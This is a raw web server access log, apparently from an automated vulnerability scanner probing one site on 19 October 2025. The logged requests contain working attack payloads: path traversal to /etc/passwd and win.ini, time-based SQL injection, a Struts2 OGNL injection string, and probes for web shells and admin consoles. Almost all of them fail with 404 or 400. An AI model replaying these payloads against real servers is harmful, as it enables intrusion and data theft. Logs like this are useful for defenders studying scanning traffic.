205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/9 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/2 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/1 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/6 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/1 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/10 HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/10 HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/9 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/10 HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/6 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/9 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/4 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/3 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/7 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/9 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/10 HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/7 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/5 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/3 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/1 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/9 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/7 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/10 HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/9 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/2 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/6 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/5 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:07 +0530] "GET /api/v1/database/4 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:43:14 +0530] "GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:18:43:14 +0530] "GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:18:43:19 +0530] "GET /api/hassio/app/.%09./supervisor/info HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:18:43:19 +0530] "POST /api/add-article-by-text HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:18:43:19 +0530] "POST /api/add-article-by-text HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:18:43:20 +0530] "GET /api/hassio/app/.%09./supervisor/info HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:18:43:25 +0530] "GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:18:43:26 +0530] "GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:18:43:33 +0530] "GET /module/tshirtecommerce/designer?product_id=900982561&parent_id=1;SELECT%20SLEEP(8); HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:18:43:35 +0530] "GET /module/tshirtecommerce/designer?product_id=900982561&parent_id=1;SELECT%20SLEEP(8); HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:18:44:23 +0530] "GET /app?service=page/SetupCompleted HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:18:44:23 +0530] "GET /app?service=page/SetupCompleted HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:18:44:29 +0530] "POST /app HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:18:44:29 +0530] "POST /app HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:18:44:34 +0530] "POST /app HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:18:44:34 +0530] "POST /app HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:18:44:39 +0530] "POST /app HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:18:44:39 +0530] "POST /app HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:18:44:45 +0530] "POST /app HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:18:44:45 +0530] "POST /app HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:18:44:49 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:44:49 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:44:49 +0530] "POST /app HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:18:44:50 +0530] "POST /app HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:18:44:56 +0530] "GET /app?service=page/PrinterList HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:18:44:56 +0530] "GET /app?service=page/PrinterList HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:18:45:02 +0530] "POST /tshirtecommerce/ajax.php?type=svg HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:18:45:03 +0530] "POST /tshirtecommerce/ajax.php?type=svg HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:18:45:39 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:45:39 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:45:42 +0530] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 404 1082
205.185.122.202 - - [19/Oct/2025:18:45:43 +0530] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 404 1082
205.185.122.202 - - [19/Oct/2025:18:45:48 +0530] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:18:45:48 +0530] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:18:48:41 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:48:41 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:18:57:58 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:18:58:03 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:19:00:25 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:19:00:52 +0530] "GET / HTTP/1.1" 200 11250
20.163.39.86 - - [19/Oct/2025:19:06:21 +0530] "GET / HTTP/1.1" 200 11250
20.163.39.86 - - [19/Oct/2025:19:06:22 +0530] "-" 400 -
40.124.175.52 - - [19/Oct/2025:19:09:03 +0530] "GET / HTTP/1.1" 200 11250
40.124.175.52 - - [19/Oct/2025:19:09:04 +0530] "-" 400 -
204.76.203.15 - - [19/Oct/2025:19:58:42 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:20:00:00 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:20:11:05 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:20:11:09 +0530] "GET / HTTP/1.1" 200 11250
20.14.81.42 - - [19/Oct/2025:20:16:55 +0530] "GET /actuator/health HTTP/1.1" 404 1024
20.14.81.42 - - [19/Oct/2025:20:17:04 +0530] "GET /actuator/health HTTP/1.1" 404 1024
204.76.203.219 - - [19/Oct/2025:20:25:06 +0530] "GET / HTTP/1.1" 200 11250
45.153.34.54 - - [19/Oct/2025:20:28:54 +0530] "GET / HTTP/1.0" 200 11230
204.76.203.219 - - [19/Oct/2025:20:36:21 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:50:15 +0530] "GET /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:50:21 +0530] "GET //etc/passwd HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:50:21 +0530] "GET //../../etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:50:22 +0530] "GET //../../../../etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:50:22 +0530] "GET //../../../../../../etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:50:23 +0530] "GET //../../../../../../../../etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:50:23 +0530] "GET //windows/win.ini HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:50:24 +0530] "GET //../../windows/win.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:50:24 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:50:24 +0530] "GET //../../../../windows/win.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:50:25 +0530] "GET //../../../../../../windows/win.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:50:25 +0530] "GET //../../../../../../../../windows/win.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:50:26 +0530] "GET //Windows%5Cwin.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:50:26 +0530] "GET //../../Windows%5Cwin.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:50:27 +0530] "GET //../../../../Windows%5Cwin.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:50:27 +0530] "GET //../../../../../../Windows%5Cwin.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:50:28 +0530] "GET //../../../../../../../../Windows%5Cwin.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:50:33 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:50:34 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:50:34 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:50:35 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:50:35 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:50:36 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:50:47 +0530] "POST /service/extdirect HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:50:50 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:50:50 +0530] "GET /toLogin HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:50:53 +0530] "GET /tomcat.css HTTP/1.1" 206 1024
205.185.122.202 - - [19/Oct/2025:20:50:53 +0530] "GET /pentaho/api/repos/dashboards/editor?command=executeQuery&datasource=pentaho_operations_mart&query=select%20encode('vpchehss','base64')&require-cfg.js HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:20:50:53 +0530] "GET /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:50:53 +0530] "GET /tomcat.css HTTP/1.1" 206 129
205.185.122.202 - - [19/Oct/2025:20:50:56 +0530] "GET /secure/ViewUserHover.jspa?username=hgudxifp HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:20:50:58 +0530] "POST /search.php?print(925924384%2b898756054) HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:50:58 +0530] "GET /nkwkfdgnwo HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:50:58 +0530] "GET /tkvxlqokxs HTTP/1.1" 404 1014
162.243.25.208 - - [19/Oct/2025:20:50:59 +0530] "-" 400 -
205.185.122.202 - - [19/Oct/2025:20:50:59 +0530] "GET /hdfzewglwu HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:50:59 +0530] "GET //etc/passwd HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:50:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
205.185.122.202 - - [19/Oct/2025:20:50:59 +0530] "GET //../../etc/passwd HTTP/1.1" 400 -
162.243.25.208 - - [19/Oct/2025:20:50:59 +0530] "-" 400 -
162.243.25.208 - - [19/Oct/2025:20:51:00 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:00 +0530] "GET //../../../../etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:51:00 +0530] "GET //../../../../../../etc/passwd HTTP/1.1" 400 -
162.243.25.208 - - [19/Oct/2025:20:51:00 +0530] "GET /download/powershell/ HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:20:51:01 +0530] "GET //../../../../../../../../etc/passwd HTTP/1.1" 400 -
162.243.25.208 - - [19/Oct/2025:20:51:01 +0530] "GET /get.php HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:51:01 +0530] "GET /api/dbstat/gettablessize HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:20:51:01 +0530] "GET /?%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43req%5C75@org.apache.struts2.ServletActionContext@getRequest%28%29%27%29%28d%29%29&%28i2%29%28%28%27%5C43xman%5C75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28i97%29%28%28%27%5C43xman.getWriter%28%29.println%2841971*44463%29%27%29%28d%29%29&%28i99%29%28%28%27%5C43xman.getWriter%28%29.close%28%29%27%29%28d%29%29 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:01 +0530] "GET //windows/win.ini HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:51:02 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:02 +0530] "GET //../../windows/win.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:51:02 +0530] "GET //../../../../windows/win.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:51:02 +0530] "GET //../../../../../../windows/win.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:51:03 +0530] "GET /mnzrwgswqf HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:03 +0530] "GET /jenkins/script HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:51:03 +0530] "GET //../../../../../../../../windows/win.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:51:03 +0530] "GET /general/login_code.php HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:20:51:03 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:04 +0530] "GET //Windows%5Cwin.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:51:04 +0530] "GET /thkuraddnb HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:04 +0530] "GET /ispirit/login_code.php HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:20:51:04 +0530] "GET /resin-admin/ HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:04 +0530] "GET /index.action?debug=command&expression=(43705*41176) HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:04 +0530] "GET //../../Windows%5Cwin.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:51:04 +0530] "GET /login.action?debug=command&expression=(44386*44382) HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:05 +0530] "GET //../../../../Windows%5Cwin.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:51:05 +0530] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:20:51:05 +0530] "GET /vutnrnodvc HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:05 +0530] "GET //../../../../../../Windows%5Cwin.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:51:06 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:06 +0530] "GET /.bashrc HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:51:06 +0530] "GET /.zshrc HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:51:06 +0530] "GET //../../../../../../../../Windows%5Cwin.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:51:06 +0530] "GET /.bash_profile HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:51:06 +0530] "GET /index.action?debug=command&expression=(40779*41558) HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:06 +0530] "GET /.bash_logout HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:07 +0530] "GET /login.action?debug=command&expression=(42584*40521) HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:07 +0530] "GET /_next/static/../server/pages-manifest.json HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:20:51:07 +0530] "GET /pskqnlimkh HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:08 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:08 +0530] "GET /logs/ HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:51:08 +0530] "GET /index.action?debug=command&expression=(41017*44182) HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:09 +0530] "GET /login.action?debug=command&expression=(40691*44532) HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:09 +0530] "GET /v1_0/home/jobfairol/resumelist?jobfair_id=5&keyword=1 HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:20:51:09 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:10 +0530] "GET /fqazkhhupd HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:10 +0530] "GET /statistics.html HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:51:10 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:10 +0530] "GET /index.action?debug=command&expression=(42456*43995) HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:10 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:10 +0530] "GET /login.action?debug=command&expression=(43339*43555) HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:11 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:11 +0530] "POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1" 404 1108
205.185.122.202 - - [19/Oct/2025:20:51:11 +0530] "GET /izqlnxlpgg HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:11 +0530] "GET $%7B43124%2A40280%7D.action HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:51:11 +0530] "GET /debug.txt HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:12 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:12 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:12 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:12 +0530] "GET /mvutccmdgq HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:12 +0530] "GET /debug HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:51:13 +0530] "GET /macwqmtgsg HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:13 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:51:13 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:13 +0530] "GET /server-status HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:51:13 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:51:13 +0530] "GET /fqthqugdwg HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:14 +0530] "GET /index.action?redirect:%24%7B43553*43383%7D HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:14 +0530] "GET /fosagent/repl/download-file?basedir=4&filepath=../../etc/passwd HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:20:51:14 +0530] "GET /jmx-console/HtmlAdaptor HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:20:51:14 +0530] "GET /login.action?redirect:%24%7B42626*41412%7D HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:14 +0530] "GET /fosagent/repl/download-snapshot?name=../../../../../../../etc/passwd HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:20:51:14 +0530] "GET /ucnzfhrkht HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:14 +0530] "POST /auth/check HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:15 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:15 +0530] "GET /examples/ HTTP/1.1" 200 1126
205.185.122.202 - - [19/Oct/2025:20:51:15 +0530] "GET /muxdvfsrue HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:15 +0530] "GET /upload.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:15 +0530] "GET /index.action?redirect:http://c6g.om0i HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:15 +0530] "GET /upload.jsp HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:15 +0530] "GET /login.action?redirect:http://6xd.c7kf HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:16 +0530] "GET /upload.asp HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:16 +0530] "GET /upload.aspx HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:51:16 +0530] "GET /upload.html HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:51:16 +0530] "GET /stgzxdfvgq HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:17 +0530] "GET /report/download.php?pdf=../../../../../etc/passwd HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:20:51:17 +0530] "GET /upload.do HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:17 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:17 +0530] "GET /tmlxkglsbx HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:17 +0530] "GET /upfile.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:17 +0530] "GET /examples/servlets/servlet/SessionExample HTTP/1.1" 200 1247
205.185.122.202 - - [19/Oct/2025:20:51:17 +0530] "GET /db.sqlite HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:17 +0530] "GET /upfile.jsp HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:17 +0530] "GET /index.action?testzz[%27testzz%27] HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:17 +0530] "GET /qwgzkcoysu HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:17 +0530] "GET /db.sqlite3 HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:17 +0530] "GET /upfile.asp HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:18 +0530] "GET /login.action?testzz[%27testzz%27] HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:18 +0530] "GET /resin-doc/resource/tutorial/jndi-appconfig/test%3FinputFile=/etc/profile HTTP/1.1" 404 1138
205.185.122.202 - - [19/Oct/2025:20:51:18 +0530] "GET /upfile.aspx HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:51:18 +0530] "GET /upfile.html HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:51:18 +0530] "GET /qhwtsucfyq HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:18 +0530] "GET /upfile.do HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:19 +0530] "GET /resin-doc/viewfile/%3Fcontextpath=/&servletpath=&file=index.jsp HTTP/1.1" 404 1136
205.185.122.202 - - [19/Oct/2025:20:51:19 +0530] "GET /qtsbudbvdp HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:19 +0530] "GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:19 +0530] "GET /vendor/composer/LICENSE HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:20:51:20 +0530] "GET /wzbmkrazgn HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:20 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:20 +0530] "GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(4)%20--%20g HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:20 +0530] "GET /shell.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:20 +0530] "GET /shell.jsp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:20 +0530] "GET /index.action?testzz[%27testzz%27] HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:21 +0530] "GET /zpnfumebqa HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:21 +0530] "GET /shell.jspx HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:21 +0530] "GET /login.action?testzz[%27testzz%27] HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:21 +0530] "GET /debug/pprof/ HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:21 +0530] "GET /shell.asp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:21 +0530] "GET /shell.aspx HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:21 +0530] "GET /webshell.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:22 +0530] "GET /webshell.jsp HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:22 +0530] "GET /webshell.jspx HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:51:22 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:51:22 +0530] "GET /yfkiggnund HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:22 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:22 +0530] "GET /webshell.asp HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:23 +0530] "GET /files/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:51:23 +0530] "GET /index.action?testzz[%27testzz%27] HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:23 +0530] "GET /webshell.aspx HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:51:23 +0530] "GET /login.action?testzz[%27testzz%27] HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:23 +0530] "GET /1.php HTTP/1.1" 404 1004
